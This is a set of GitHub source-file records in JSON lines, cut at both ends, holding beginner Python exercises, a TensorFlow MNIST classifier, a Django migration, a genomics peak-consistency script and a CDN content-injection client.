'Charts'))\nif page=='Input':\n    get_inputs()\nif page=='Home':\n    main()\nif page=='Full Data':\n    full_data() \nif page=='Charts':\n    charts()\n    \n","repo_name":"jkattirtzi/Mtracker","sub_path":"Mtracker1.py","file_name":"Mtracker1.py","file_ext":"py","file_size_in_byte":7790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"20438000065","text":"numeros = list()\r\nwhile True:\r\n    n = int(input('Digite um numero: '))\r\n    if n not in numeros:\r\n        numeros.append(n)\r\n        print('Valor adicionado com sucesso...')\r\n    else:\r\n        print('O valor digitado ja existe na lista... Nao adicionado')\r\n    usuario = str(input('Quer continuar [S/N]: ')).strip().upper()[0]\r\n    while usuario not in 'SN':\r\n        print('opcao Invalida. Tente Novamente.')\r\n        usuario = str(input('Quer continuar [S/ N]: ')).strip().upper()[0]\r\n    if usuario in 'N':\r\n        break\r\nnumeros.sort()\r\nprint('-=-'*15)\r\nprint('Voce digitou os seguintes numeros: ', end='')\r\nfor nr in numeros:\r\n    print(nr, end=' ')\r\nprint('-=-'*15)\r\nprint('Programa Terminado')\r\n","repo_name":"Carmona-Elias/Python_CEV","sub_path":"D_079.py","file_name":"D_079.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"27555212832","text":"from tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\nsess = tf.InteractiveSession()\n\nin_units = 784\nh1_units = 300\nW1 = tf.Variable(tf.truncated_normal([in_units, h1_units], stddev=0.1))\nb1 = tf.Variable(tf.zeros([h1_units]))\nW2 = tf.Variable(tf.zeros([h1_units, 10]))\nb2 = tf.Variable(tf.zeros([10]))\n\nx = tf.placeholder(tf.float32, [None, in_units])\nkeep_prob = tf.placeholder(tf.float32)\n\nhidden1 = tf.nn.relu(tf.matmul(x, W1) + b1)\nhidden1_drop = tf.nn.dropout(hidden1, keep_prob)\ny = tf.nn.softmax(tf.matmul(hidden1_drop, W2) + b2)\n\n# Define loss and optimizer\ny_ = tf.placeholder(tf.float32, [None, 10])\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))\ntrain_step = tf.train.AdagradOptimizer(0.3).minimize(cross_entropy)\n\n# Train\ntf.global_variables_initializer().run()\nfor i in range(3000):\n    batch_xs, batch_ys = mnist.train.next_batch(100)\n    train_step.run({x: batch_xs, y_: batch_ys, keep_prob: 0.75})\n\n# Test trained model\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nprint(accuracy.eval({x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))","repo_name":"MachineLP/Tensorflow-","sub_path":"Tensorflow/4_4_MLP.py","file_name":"4_4_MLP.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":1135,"dataset":"github-code","pt":"54"}
{"seq_id":"25660968564","text":"galera = []\npessoa = {}\nsomador = contador = 0\nwhile True:\n    pessoa.clear() # clear the dict so the previous person is not repeated\n    pessoa['Nome'] = str(input('Nome: '))\n    while True: \n        pessoa['Sexo'] = str(input('Sexo: [M/F]')).upper()[0]\n        if pessoa['Sexo'] in 'MF':\n            break\n        else:\n            print('ERRO. POR FAVOR, DIGITE M OU F.') \n    pessoa['idade'] = int(input('Idade: '))\n    somador += pessoa['idade']\n    galera.append(pessoa.copy()) # append a copy of pessoa\n    while True:\n        resposta = str(input('Quer continuar? [S/N]')).upper()[0]\n        if resposta in 'SN':\n            break # two breaks are needed to leave both while loops\n        else: \n            print('ERRO. POR FAVOR, DIGITE S OU N.')\n    if resposta == 'N':\n        break\nmedia = somador / len(galera)\nprint('-='*30)\nprint(galera)\nprint(f'A) Ao todo, foram cadastradas {len(galera)} pessoas.')\nprint(f'B) A média das pessoas cadastradas foi de {media:.1f} anos')\nprint('C) As mulheres cadastradas foram: ', end='')\nfor p in galera:\n    if p['Sexo'] in 'Ff':\n        print(f' -{p[\"Nome\"]}', end='')\n    print() # line break\nprint(' D) lista das pessoas que estão acima da média: ',end='')\nfor p in galera:\n    if p['idade'] > media:\n        print(f' -{p[\"Nome\"]}',end='')\n    print() # line break\nprint('<< ENCERRADO >>')","repo_name":"RonalddMatias/Curso-Completo-Python","sub_path":"Curso de Python/Python-Exercícios/ex094.py","file_name":"ex094.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"42159545629","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('machine', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name='machine',\n            name='machine_ip',\n            field=models.GenericIPAddressField(null=True, verbose_name=b'Machine IP', blank=True),\n        ),\n    ]\n","repo_name":"TeraMatrix/nocout_gis_open","sub_path":"nocout/machine/migrations/0002_auto_20150720_1351.py","file_name":"0002_auto_20150720_1351.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"6068011938","text":"###\n### this script explores the distribution of patterns between expression and peak locations\n###\n\nimport os,sys,numpy,pickle,copy\nimport multiprocessing, multiprocessing.pool\n\nimport matplotlib\nmatplotlib.use('Agg') # necessary for saving figures on a remote machine\nimport matplotlib.pyplot\n\ndef consistentGenePerSampleFinder(flag):\n\n    '''\n    this function searches and stores genes with consistent pattern of FSSs per biological replicate\n    '''\n\n    bioReplicates=[('0hA','0hB'),('24hA','24hB'),('48hA','48hB')]\n    consistentGenes={}\n    \n    for bio in bioReplicates:\n        \n        if flag == 'all':\n            pairsOfPeaks=consistentAllPeaks[bio]\n        elif flag == 'filtered':\n            pairsOfPeaks=consistentFilteredPeaks[bio]\n        else:\n            print('error interpreting flag. exiting...')\n            sys.exit()\n\n        g=[]\n        for peakPair in pairsOfPeaks:\n\n            currentSampleLabel=peakPair[0].split('.')[0]\n            currentPeakName=peakPair[0].split(currentSampleLabel+'.')[1]\n            peakA=rawPeaks[currentSampleLabel][currentPeakName]\n            closerA=peakLocator(peakA)\n\n            currentSampleLabel=peakPair[1].split('.')[0]\n            currentPeakName=peakPair[1].split(currentSampleLabel+'.')[1]\n            peakB=rawPeaks[currentSampleLabel][currentPeakName]\n            closerB=peakLocator(peakB)\n\n            if closerA != None:\n                if closerA == closerB:\n                    if closerA not in g:\n                        g.append(closerA)\n\n        consistentGenes[bio]=g\n    \n    # storing the info into pickles\n    if flag == 'all':\n        jarFile=jarDir+'consistentGenes.all.pickle'\n    elif flag == 'filtered':\n        jarFile=jarDir+'consistentGenes.filtered.pickle'\n    else:\n        print('error interpreting flag. 
exiting...')\n sys.exit()\n \n f=open(jarFile,'wb')\n pickle.dump(consistentGenes,f)\n f.close()\n \n return None\n\ndef consistentPeakFinder(task):\n\n '''\n this function iterates over the peaks of another sample to find consistency\n '''\n\n consistentPeaks=[]\n \n # recovering task arguments\n workingPeakName=task[0]\n labelA=task[1]\n labelB=task[2]\n\n # searching the other sample for consistency\n founds=[]\n peakA=rawPeaks[labelA][workingPeakName] \n for peakNameB in rawPeaks[labelB]: \n peakB=rawPeaks[labelB][peakNameB] \n\n # check if they are in the same contig\n if peakA[0] == peakB[0]:\n flag,overlap=isConsistent([peakA,peakB])\n if flag == True:\n pairA=labelA+'.'+workingPeakName\n pairB=labelB+'.'+peakNameB\n consistentPair=[pairA,pairB]\n founds.append([consistentPair,overlap])\n \n # dealing with multiple hits\n if founds != []:\n if len(founds) == 1:\n consistentPeaks=founds[0][0]\n else:\n overlaps=[element[1] for element in founds]\n sortedOverlaps=copy.deepcopy(overlaps)\n sortedOverlaps.sort(reverse=True)\n if sortedOverlaps[0] != sortedOverlaps[1]:\n theIndex=overlaps.index(sortedOverlaps[0])\n consistentPeaks=founds[theIndex][0]\n else:\n feRanks=[]\n putativePeaks=[element[0][1] for element in founds if element[1] == sortedOverlaps[0]]\n feRanks=[rawPeaks[labelB][element.split(labelB+'.')[1]][-1] for element in putativePeaks]\n sortedFEranks=copy.deepcopy(feRanks)\n sortedFEranks.sort(reverse=True)\n selected=putativePeaks[feRanks.index(sortedFEranks[0])]\n consistentPeaks=[founds[0][0][0],selected]\n \n return consistentPeaks\n\ndef generalConsistency():\n\n '''\n this function checks the consistency of peaks over replicates\n '''\n\n hydra=multiprocessing.pool.Pool(numberOfThreads)\n \n consistentAllPeaks={}\n consistentFilteredPeaks={}\n \n samples=list(rawPeaks.keys())\n samples.sort()\n\n for i in range(len(samples)):\n filteredPeakNamesA=list(selectedPeaks[samples[i]].keys())\n for j in range(len(samples)):\n if i < j:\n filteredPeakNamesB=list(selectedPeaks[samples[j]].keys())\n comparisonA=[]\n comparisonF=[]\n theKey=(samples[i],samples[j])\n\n workNames=list(rawPeaks[samples[i]].keys())\n tasks=[[peakName,samples[i],samples[j]] for peakName in workNames]\n print('\\t comparing %s peaks between samples %s and %s...'%(len(tasks),theKey[0],theKey[1]))\n\n output=hydra.map(consistentPeakFinder,tasks) \n for element in output:\n if element != []:\n comparisonA.append(element)\n\n peakNameA=element[0].split(theKey[0]+'.')[1]\n peakNameB=element[1].split(theKey[1]+'.')[1]\n if peakNameA in filteredPeakNamesA and peakNameB in filteredPeakNamesB:\n comparisonF.append(element)\n \n consistentAllPeaks[theKey]=comparisonA\n consistentFilteredPeaks[theKey]=comparisonF\n print('\\t found {} all and {} filtered consistent peaks.'.format(len(comparisonA),len(comparisonF)))\n print()\n \n # creating variable for graphical representation\n MA=[]; MF=[]\n for i in range(len(samples)):\n va=[]; vf=[]\n for j in range(len(samples)):\n if i == j:\n valueA=len(rawPeaks[samples[i]])\n valueF=len(selectedPeaks[samples[i]])\n else:\n localKey=(samples[i],samples[j])\n inverseKey=(samples[j],samples[i])\n if localKey in consistentAllPeaks.keys():\n workingKey=localKey\n else:\n workingKey=inverseKey\n valueA=len(consistentAllPeaks[workingKey])\n valueF=len(consistentFilteredPeaks[workingKey])\n va.append(valueA)\n vf.append(valueF)\n MA.append(va)\n MF.append(vf)\n\n return consistentAllPeaks,consistentFilteredPeaks,MA,MF\n\ndef genomeOccupancyCalculator(assessingPeaks,label):\n\n 
'''\n this function computes the size of the genome peaks occupy\n '''\n\n sumLength=0\n allLabels=[]\n for peakName in assessingPeaks.keys():\n currentLabel=assessingPeaks[peakName][0]+'.'+str(assessingPeaks[peakName][1])+'.'+str(assessingPeaks[peakName][2])\n if currentLabel not in allLabels:\n allLabels.append(currentLabel)\n peakSize=assessingPeaks[peakName][3]\n sumLength=sumLength+peakSize\n percentage=sumLength/genomeSize\n print('\\tsum of',label,'peak lengths is',sumLength,'relative size',percentage)\n\n return None\n\ndef genomeReader():\n\n '''\n this function returns the position of genes\n '''\n\n genePositions={} # genePositions[geneName]=[chr,start,stop]\n\n with open(gff3File,'r') as f:\n next(f)\n next(f)\n for line in f:\n vector=line.split('\\t')\n if vector[2] == 'gene':\n geneName=vector[8].split('.v5.5')[0].split('ID=')[1]\n chromosome=vector[0]\n start=int(vector[3])\n stop=int(vector[4])\n genePositions[geneName]=[chromosome,start,stop]\n\n return genePositions\n\ndef getSignature10(task):\n\n '''\n this function returns the gene name for a peak with signature 10\n '''\n \n peakPair=task[0]\n flatCondition=task[1]\n extension=task[2]\n\n if extension == 'all':\n workingPeaks=rawPeaks\n elif extension == 'filtered':\n workingPeaks=selectedPeaks\n else:\n print('error from getSignature10. exiting...')\n sys.exit()\n\n currentSampleLabel=peakPair[0].split('.')[0]\n currentPeakName=peakPair[0].split(currentSampleLabel+'.')[1]\n currentChromosome=rawPeaks[currentSampleLabel][currentPeakName][0]\n \n # check that none of the two peaks of the pair is at the flatten condition\n founds=[]\n flattenPeaksA=[workingPeaks[flatCondition[0]][peakName] for peakName in workingPeaks[flatCondition[0]] if workingPeaks[flatCondition[0]][peakName][0] == currentChromosome]\n flattenPeaksB=[workingPeaks[flatCondition[1]][peakName] for peakName in workingPeaks[flatCondition[1]] if workingPeaks[flatCondition[1]][peakName][0] == currentChromosome]\n flattenPeaks=flattenPeaksA+flattenPeaksB\n for single in peakPair:\n peakA=rawPeaks[currentSampleLabel][currentPeakName]\n for peakB in flattenPeaks:\n flag,overlap=isConsistent([peakA,peakB])\n founds.append(flag)\n \n if sum(founds) == 0:\n geneName=peakLocator(peakA)\n else:\n geneName=None \n\n return geneName\n \ndef isConsistent(pair):\n\n '''\n this function compares 2 peaks: they are considered consistent if they share 50% of their average length.\n '''\n\n flag=False\n\n peakA=pair[0]\n peakB=pair[1]\n # compute overlap\n min1=peakA[1]\n max1=peakA[2]\n min2=peakB[1]\n max2=peakB[2]\n overlap=max(0, min(max1, max2) - max(min1, min2))\n if overlap > 0:\n # compute that overlap is at least 50% of average length\n averageLength=numpy.mean([peakA[3],peakB[3]])\n threshold=averageLength*0.5\n if overlap >= threshold:\n flag=True \n \n return flag,overlap\n\ndef matrixGrapher(M,labels,figureTitle):\n\n '''\n this figure builds the correlation matrix\n '''\n\n figureName=figuresDir+'peakConsistency.{}.{}.png'.format(figureTitle.split(' ')[0],figureTitle.split(' ')[1])\n\n matplotlib.pyplot.imshow(M,interpolation='none',cmap='viridis')\n cb=matplotlib.pyplot.colorbar(orientation='vertical',fraction=0.05) \n cb.set_label(label='Consistent Peaks',size=20)\n cb.ax.tick_params(labelsize=16)\n matplotlib.pyplot.grid(False)\n\n # setting the numbers\n x=0.\n y=0.\n deltax=1.\n deltay=1.\n for i in range(len(M)):\n for j in range(len(M)):\n stringValue=str(M[i][j])\n 
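# added comment: draw each cell's consistency count centered in the heatmap cell\n            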
matplotlib.pyplot.text(x+deltax*i,y+deltay*j,stringValue,fontsize=16,color='white',horizontalalignment='center',verticalalignment='center',fontweight='bold')\n\n matplotlib.pyplot.xticks(range(len(labels)),labels,size=20,rotation=90)\n matplotlib.pyplot.yticks(range(len(labels)),labels,size=20)\n \n matplotlib.pyplot.tick_params(axis='x',which='both',bottom='off',top='off')\n matplotlib.pyplot.tick_params(axis='y',which='both',right='off',left='off')\n matplotlib.pyplot.axes().set_aspect('equal')\n matplotlib.pyplot.title(figureTitle,fontsize=24)\n matplotlib.pyplot.tight_layout(0.5)\n matplotlib.pyplot.savefig(figureName)\n\n matplotlib.pyplot.clf()\n\n return None\n\ndef peakLocator(peak):\n\n '''\n this function returns the gene closer to a peak:\n 1) it searches what gene has closer midpoint to peak midpoint\n 2) it returns a valid gene if it is within 20% of the length of the gene\n '''\n \n gene4Peak=None\n\n # 1. computing the gene with shortest distance\n distance=float('Inf')\n peakChromosome=peak[0]\n peakCenter=peak[1]+(peak[2]-peak[1])/2\n \n for geneName in genePositions.keys():\n workingChromosome=genePositions[geneName][0]\n \n if workingChromosome == peakChromosome:\n start=genePositions[geneName][1]\n stop=genePositions[geneName][2]\n interval=stop-start\n geneCenter=start+interval/2\n workingDistance=abs(geneCenter-peakCenter)\n if workingDistance < distance:\n distance=workingDistance\n gene4Peak=geneName \n \n # 2. check that the peak is within 20% of the length of the gene #### this function needs to be improved to avoid overlaps and search for at least 0.5 kb if gene is very small\n #! consider doing 33%. \n if gene4Peak != None:\n start=genePositions[gene4Peak][1]\n stop=genePositions[gene4Peak][2]\n interval=stop-start\n bottom=start-int(0.2*interval)\n top=stop+int(0.2*interval)\n\n if peak[1] > bottom and peak[2] < top:\n pass\n else:\n gene4Peak=None\n \n return gene4Peak\n\ndef peakReader():\n\n '''\n this function reads specific information from the peaks file generated by MACS2.0\n '''\n\n peaks={} # a dictionary with the following structure: peaks[name]=[chro,start,end,length,fe]\n peaksFile=peaksDir+peaksFileName\n with open(peaksFile,'r') as f:\n for line in f:\n vector=line.split('\\t')\n if len(vector) == 10:\n if 'peak' in vector[9]:\n\n # name\n brokenName=vector[9].split('_')\n name=brokenName[1]+'.'+brokenName[2].replace('\\n','')\n # chr\n chro=vector[0]\n # start\n start=int(vector[1])\n # end\n end=int(vector[2])\n # length\n length=int(vector[3])\n # fold-enrichment\n fe=float(vector[7])\n\n peaks[name]=[chro,start,end,length,fe]\n\n lastLetter=name[-1]\n if lastLetter.isdigit():\n numberOfPeaks=int(name.split('.')[1])\n else:\n numberOfPeaks=int(name.split('.')[1][:-1])\n numberOfSummits=len(peaks.keys())\n\n print('\\t%s peaks found; %s summits found.'%(numberOfPeaks,numberOfSummits))\n\n return peaks\n\ndef peaksDistributionPlotter(peaks,flag):\n\n '''\n this function build 2D histograms of peaks fe and size\n '''\n\n x=[];y=[]\n for name in peaks.keys():\n fe=peaks[name][-1]\n size=peaks[name][-2]\n \n x.append(fe)\n y.append(numpy.log10(size))\n\n feRange=[1,5]\n sizeRange=[2,4.05]\n\n h,xedges,yedges,tempo=matplotlib.pyplot.hist2d(x,y,bins=100,range=[feRange,sizeRange])\n z=numpy.log10(h+1).T\n zm=numpy.ma.masked_where(z == 0,z)\n\n \n newViridis=matplotlib.cm.viridis\n newViridis.set_bad('white') \n 
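# added comment: render the log10-scaled histogram; masked zero-count bins appear white\n    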
matplotlib.pyplot.imshow(zm,extent=[xedges[0],xedges[-1],yedges[0],yedges[-1]],cmap=newViridis,interpolation='nearest',origin='lower',aspect='auto',vmin=0,vmax=2)\n cb=matplotlib.pyplot.colorbar(fraction=0.05)\n cb.set_label(label='log$_{10}$ Peak Count',size=20)\n cb.ax.tick_params(labelsize=18)\n\n # highlightling area of best peaks\n matplotlib.pyplot.plot([2,5],[3,3],'-k',color='red',lw=2)\n matplotlib.pyplot.plot([2,2],[2,3],'-k',color='red',lw=2)\n \n matplotlib.pyplot.xlabel('Fold Enrichment',fontsize=28)\n matplotlib.pyplot.ylabel('Site Length (bp)',fontsize=28)\n\n positions=numpy.log10(numpy.array([100,200,300,500,750,1000,2000,4000,8000]))\n names=['100','200','300','500','750','1,000','2,000','4,000','8,000']\n matplotlib.pyplot.yticks(positions,names,fontsize=20)\n matplotlib.pyplot.xticks(fontsize=20)\n\n theTitle='sample '+flag.split('.')[1]\n matplotlib.pyplot.title(theTitle,fontsize=36)\n \n matplotlib.pyplot.tight_layout()\n \n matplotlib.pyplot.savefig(figuresDir+'figure.%s.png'%flag)\n matplotlib.pyplot.clf()\n\n return None\n\ndef peaksFilter():\n\n '''\n this function removes any peak that is lower than 2-fold and extends for longer than 1 kb. \n '''\n\n filteredPeaks={}\n\n Dfe=[]\n Dsize=[]\n Efe=[]\n Esize=[]\n\n for name in peaks.keys():\n fe=peaks[name][-1]\n size=peaks[name][-2]\n\n Dfe.append(fe)\n Dsize.append(size)\n \n if fe >= peakFEThreshold and size <= peakLengthThreshold:\n filteredPeaks[name]=peaks[name]\n \n Efe.append(fe)\n Esize.append(size)\n\n # printing the number of filtered peaks and summits\n allKeys=filteredPeaks.keys()\n numberOfSummits=len(allKeys)\n uniquePeaks=[]\n for element in allKeys:\n lastLetter=element[-1]\n if lastLetter.isdigit():\n value=int(element.split('.')[1])\n else:\n value=int(element.split('.')[1][:-1])\n uniquePeaks.append(value)\n uniquePeaks=list(set(uniquePeaks))\n numberOfPeaks=len(uniquePeaks)\n\n print('\\t%s filtered peaks found; %s filtered summits found.'%(numberOfPeaks,numberOfSummits)) \n \n return filteredPeaks\n\n##\n## MAIN\n##\n\n# 0. user defined variables\npeaksDir='/proj/omics4tb/alomana/projects/csp.jgi/data/macs2.run3/'\njarDir='/proj/omics4tb/alomana/projects/csp.jgi/results/jars.wk/'\ngff3File='/proj/omics4tb/alomana/projects/csp.jgi/data/genome/Creinhardtii_281_v5.5.gene.gff3'\nfiguresDir='/proj/omics4tb/alomana/projects/csp.jgi/results/figures/'\n\nnumberOfThreads=64\n\n## testing\n## peaksDir='/proj/omics4tb/alomana/projects/csp.jgi/data/macs2.test/'\n## numberOfThreads=12\n##########\n\ncorrespondance={}\ncorrespondance['0hA']='ASCAO'\ncorrespondance['0hB']='ASCAP'\ncorrespondance['24hA']='ASCAS'\ncorrespondance['24hB']='ASCAT'\ncorrespondance['48hA']='ASCAU'\ncorrespondance['48hB']='ASCAW'\n\npeakFEThreshold=2\npeakLengthThreshold=1000\ngenomeSize=111098438\n\n# 0.1. reading gene locations\ngenePositions=genomeReader()\n\n# 1. selecting the samples\nprint('selecting samples...')\nallFiles=os.listdir(peaksDir)\npeaksFileNames=[element for element in allFiles if '_peaks.xls' in element if 'callerC' in element]\npeaksFileNames.sort()\n\n# 2. filter peaks: at least 2-fold and no longer than 1 kb\nprint('filtering samples...')\n\nrawPeaks={}\nselectedPeaks={}\nfor peaksFileName in peaksFileNames:\n\n label=peaksFileName.split('_')[0].split('.')[1]\n print('filtering sample %s...'%label)\n\n # 2.1. reading peaks\n peaks=peakReader()\n rawPeaks[label]=peaks\n filteredPeaks=peaksFilter()\n selectedPeaks[label]=filteredPeaks\n\n # 2.2. 
plot the distribution of peaks\n flag=peaksFileName.split('_peaks')[0]\n peaksDistributionPlotter(peaks,flag)\n\n # 2.3. computing the size of genome that peaks occupy\n genomeOccupancyCalculator(peaks,'all')\n genomeOccupancyCalculator(filteredPeaks,'filtered')\n\n# 3. define all genes that have matching patterns\nprint()\nprint('finding consistency among peaks...')\n\n# 3.1. finding consistent peaks among all peaks\nconsistentAllPeaks,consistentFilteredPeaks,MA,MF=generalConsistency()\n\n# 3.2. finding and storing genes with consistent peak presence\nprint('finding and storing genes with consistent peak presence...')\nconsistentGenePerSampleFinder('all')\nconsistentGenePerSampleFinder('filtered')\n\n# 3.3. plotting heat map of consistency counts for all and filtered peaks\nprint('analysis of consistent peaks...')\nsampleNames=list(rawPeaks.keys())\nsampleNames.sort()\nmatrixGrapher(MA,sampleNames,'full set')\nmatrixGrapher(MF,sampleNames,'filtered set')\n\n# 4. locating genes with variable signature\nprint()\nprint('defining genes with specific signatures...')\nhydra=multiprocessing.pool.Pool(numberOfThreads)\n\n# 4.1. 10 signature\nprint('\\t working with 10 signature...')\n\ngenesAllSignature10=[]\ngenesFilteredSignature10=[]\n\npositiveCondition=('0hA','0hB')\nflatCondition=('24hA','24hB')\n\ntasks=[[element,flatCondition,'all'] for element in consistentAllPeaks[positiveCondition]]\nprint('\\t interrogating',len(tasks),'consistent pairs of peaks...')\noutput=hydra.map(getSignature10,tasks)\ngenesAllSignature10=list(set(output))\ngenesAllSignature10.remove(None)\n\ntasks=[[element,flatCondition,'filtered'] for element in consistentFilteredPeaks[positiveCondition]]\nprint('\\t interrogating',len(tasks),'consistent and filtered pairs of peaks...')\noutput=hydra.map(getSignature10,tasks)\ngenesFilteredSignature10=list(set(output))\ngenesFilteredSignature10.remove(None)\n\nprint('%s genes found with broad 10 signature.'%len(genesAllSignature10))\nprint('%s genes found with filtered 10 signature.'%len(genesFilteredSignature10))\n\njarFile=jarDir+'signature10.pickle'\nf=open(jarFile,'wb')\npickle.dump([genesAllSignature10,genesFilteredSignature10],f)\nf.close()\n\n# 4.2. 01 signature\nprint('\\t working with 01 signature...')\n\ngenesAllSignature01=[]\ngenesFilteredSignature01=[]\n\nflatCondition=('0hA','0hB')\npositiveCondition=('24hA','24hB')\n\ntasks=[[element,flatCondition,'all'] for element in consistentAllPeaks[positiveCondition]]\nprint('\\t interrogating',len(tasks),'consistent pairs of peaks...')\noutput=hydra.map(getSignature10,tasks)\ngenesAllSignature01=list(set(output))\ngenesAllSignature01.remove(None)\n\ntasks=[[element,flatCondition,'filtered'] for element in consistentFilteredPeaks[positiveCondition]]\nprint('\\t interrogating',len(tasks),'consistent and filtered pairs of peaks...')\noutput=hydra.map(getSignature10,tasks)\ngenesFilteredSignature01=list(set(output))\ngenesFilteredSignature01.remove(None)\n\nprint('%s genes found with broad 01 signature.'%len(genesAllSignature01))\nprint('%s genes found with filtered 01 signature.'%len(genesFilteredSignature01))\n\njarFile=jarDir+'signature01.pickle'\nf=open(jarFile,'wb')\npickle.dump([genesAllSignature01,genesFilteredSignature01],f)\nf.close()\n\n# 5. final message\nprint()\nprint('... 
all done.')\n","repo_name":"adelomana/mendiak","sub_path":"patternFinder.py","file_name":"patternFinder.py","file_ext":"py","file_size_in_byte":21136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"30537489272","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\ndesc: request media asset information from the EPG server\ntime:2017-05-10\nauthor: achilles_xushy\n\"\"\"\nimport os\nimport time\nimport logging\nimport sys\nimport traceback\nimport requests\n\n\nfrom CDS_Auto_Import_tools import parameters_parse\nfrom CDS_Auto_Import_tools import xml_parser\n\nr_log = logging.getLogger(parameters_parse.MY_LOG_NAME)\n\nq_headers = {\n    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0',\n    \"Content-Type\": \"text/xml\",\n    \"Connection\": \"close\"\n}\n\npj_dict = parameters_parse.get_para_dict()\n\nif pj_dict is None:\n    r_log.error('get parameters error, please check log file and parameters_parse.py')\n    sys.exit()\n\nCDN_URL = 'http://{ip}:{port}/{interface_i}'\n\n\nclass RequestCDN(object):\n    \"\"\"\n    Shuma (digital) CDN interface class, used to call the CDN interfaces\n    \"\"\"\n\n    def __init__(self):\n        pass\n\n    @staticmethod\n    def transfer_content(in_xml_bytes):\n        \"\"\"\n        VOD content injection interface, initiated by the CMS towards the CDN; through it the CDN downloads the media files from the AMS to local storage and generates the m3u8 file.\n        :param in_xml_bytes: \n        :return: \n        \"\"\"\n        p_url = CDN_URL.format(ip=pj_dict['cdn_addr']['ip'], port=pj_dict['cdn_addr']['port'],\n                               interface_i='TransferContent')\n        try:\n            ret_value = requests.post(p_url, headers=q_headers, data=in_xml_bytes)\n        except:\n            r_log.error(traceback.format_exc())\n            return None\n        return ret_value.status_code\n\n    @staticmethod\n    def get_transfer_status(in_xml_bytes):\n        \"\"\"\n        VOD injection status query interface, initiated by the CMS towards the CDN; through it the CMS can query the state and progress of an injection task\n        :param in_xml_bytes: \n        :return: \n        \"\"\"\n        p_url = CDN_URL.format(ip=pj_dict['cdn_addr']['ip'], port=pj_dict['cdn_addr']['port'],\n                               interface_i='GetTransferStatus')\n        try:\n            ret_value = requests.post(p_url, headers=q_headers, data=in_xml_bytes)\n        except:\n            r_log.error(traceback.format_exc())\n            return None, None\n        if ret_value.status_code == 200:\n            return ret_value.status_code, ret_value.text\n        else:\n            return ret_value.status_code, None\n\n    @staticmethod\n    def cancel_transfer(in_xml_bytes):\n        \"\"\"\n        VOD injection cancel interface, initiated by the CMS towards the CDN; through it the CMS can cancel content that is still being injected,\n        while content already injected successfully is handled as a delete command\n        :param in_xml_bytes: \n        :return: \n        \"\"\"\n        p_url = CDN_URL.format(ip=pj_dict['cdn_addr']['ip'], port=pj_dict['cdn_addr']['port'],\n                               interface_i='CancelTransfer')\n        try:\n            ret_value = requests.post(p_url, headers=q_headers, data=in_xml_bytes)\n        except:\n            r_log.error(traceback.format_exc())\n            return None\n        return ret_value.status_code\n\n    @staticmethod\n    def delete_content(in_xml_bytes):\n        \"\"\"\n        VOD content deletion interface, initiated by the CMS towards the CDN; through it the CMS can delete content that has already been injected, while content still being injected is handled by the cancel interface\n        :param in_xml_bytes: \n        :return: \n        \"\"\"\n        p_url = CDN_URL.format(ip=pj_dict['cdn_addr']['ip'], port=pj_dict['cdn_addr']['port'],\n                               interface_i='DeleteContent')\n        try:\n            ret_value = requests.post(p_url, headers=q_headers, data=in_xml_bytes)\n        except:\n            r_log.error(traceback.format_exc())\n            return None\n        return ret_value.status_code\n\n\ndef test_server_post(in_xml_bytes):\n    p_url = CDN_URL.format(ip='10.255.46.104', port=15001,\n                           interface_i='TransferStatus')\n    try:\n        ret_value = requests.post(p_url, headers=q_headers, data=in_xml_bytes)\n    except:\n        r_log.error(traceback.format_exc())\n        return None\n    return ret_value.status_code\n\n\nif __name__ == '__main__':\n    test_xml_str = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<TransferStatus 
providerID=\"meixun\" assetID=\"Z67610c5f861d427af80\" volumeName=\"volumeA\"><Output subID=\"2800013\" state=\"Complete\" percentComplete=\"100\" reasonCode=\"200\" avgBitRate=\"1000012\" maxBitRate=\"1002173\" duration=\"1800\" contentSize=\"225028104\" supportFileSize=\"107728993\" md5Checksum=\"2d1ae877f2c8cd07582b7217ba0918dd\"/><Output subID=\"4480022\" state=\"Complete\" percentComplete=\"100\" reasonCode=\"200\" avgBitRate=\"1000012\" maxBitRate=\"1002173\" duration=\"1800\" contentSize=\"225028104\" supportFileSize=\"107728993\" md5Checksum=\"2d1ae877f2c8cd07582b7217ba0918dd\"/><Output subID=\"7500220\" state=\"Complete\" percentComplete=\"100\" reasonCode=\"200\" avgBitRate=\"1000012\" maxBitRate=\"1002173\" duration=\"1800\" contentSize=\"225028104\" supportFileSize=\"107728993\" md5Checksum=\"2d1ae877f2c8cd07582b7217ba0918dd\"/></TransferStatus>\"\"\"\n trans_st_str = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?><TransferStatus providerID=\"meixun\" assetID=\"3a8bbce52f63b2b7936c\" volumeName=\"volumeA\"><Output subID=\"2800012\" state=\"Complete\" percentComplete=\"100\" reasonCode=\"200\" avgBitRate=\"2800003\" maxBitRate=\"2802772\" duration=\"8859\" contentSize=\"3100696408\" supportFileSize=\"1455188926\" md5Checksum=\"443ff8fb652f74bc03e628ee3e6e08cb\"/><Output subID=\"4480019\" state=\"Complete\" percentComplete=\"100\" reasonCode=\"200\" avgBitRate=\"4480010\" 